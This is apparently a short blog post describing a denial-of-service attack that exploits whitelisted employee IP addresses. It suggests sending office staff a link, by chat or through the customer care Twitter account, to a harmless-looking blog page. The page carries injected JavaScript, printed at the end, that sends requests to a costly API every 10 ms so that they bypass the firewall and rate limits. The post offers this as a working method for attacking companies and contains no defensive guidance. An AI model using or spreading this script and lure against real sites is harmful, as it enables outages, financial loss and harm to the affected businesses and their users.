DoS attack via Trusted network

Typically every tech company has Firewall/WAF/Rate-Limiting load balancers configured to protect their website from simple DoS attacks based on their desired algorithm.

For any product based web company, up-time is a vital factor as that alone decides the company revenue in many ways. Once a site is down or all servers filled with malicious requests, based on the scalability they have, it can cause numerous losses:
1. Loses their regular customers as it gets irritated to buy any stuff on a slow website
2. New customers cannot register
3. Payments and orders can be cancelled
4. Eats lot of cloud computing resources which causes a huge bill
5. Overall it effects the company reputation

Hence up-time is a very serious factor for many product based web companies and they configure their servers to stop any DoS based attacks.

But in any company two main departments that involve with the product are: Customer Care and Development Teams. For both of the teams in any company, their IP addresses are whitelisted so that they can improve their productivity while working. When these IP addresses are whitelisted, their requests will bypass WAF and directly hit the backend servers and databases.

In this case, they can easily attack the servers and get them down. But obviously they are the employees of the company and get easily caught if they do any malicious activity. So they won’t do it. But still it is possible to compromise their systems and hackers can attack through their systems.

So compromising an employee’s system via trojans or viruses is very difficult as all their systems are having pro anti-virus softwares installed and will be monitored continuously. So this is where we can do DoS attack by using the power of JavaScript.

A simple JavaScript that makes 1000’s of requests to any of their product’s high resource consuming API can cause the servers down within few seconds to minutes. No anti-virus or firewall will stop these requests. Because these requests are made by browser and it is from trusted network (whitelisted IP). We just need to send one simple html file link to the employee while he was in his office by chat or through posting that link in their customer care twitter tweet.

The link doesn’t look suspicious, it could be a blog post with this injected JavaScript. The following JavaScript works pretty good to attack any company via their trusted network:

function my_dos() {
var TARGET = ‘https://www.site.com';
var rand = Math.floor(Math.random() * 1000);
var URI = ‘/api/resource/get?t=’;
var pic = new Image();
pic.src = TARGET + URI + rand;
}
setInterval(my_dos, 10);